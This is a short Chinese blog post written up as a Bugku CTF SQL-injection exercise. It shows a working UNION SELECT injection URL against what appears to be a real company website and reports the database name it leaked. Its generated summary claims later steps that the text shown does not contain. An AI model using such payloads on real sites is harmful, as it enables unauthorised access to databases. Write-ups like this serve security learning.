bugku ctf 实战2-注入

本文详细记录了一次CTF比赛中的SQL注入过程,从发现注入点到利用联合查询获取数据库名,再到盲注获取表名,最终揭示了表名为'tbnomax'并解出flag。通过实例展示了SQL注入的常见手法和防御思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

 进去之后发现       wtf!?

 

 

这个怎么可以注入  !??????

经过不断的点击发现

 

 

有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来   

 

正常的数字型注入  

利用联合查询  

http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20select%201,database(),3,4,5%23

爆出数据库为 u9897uwx_kabel

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值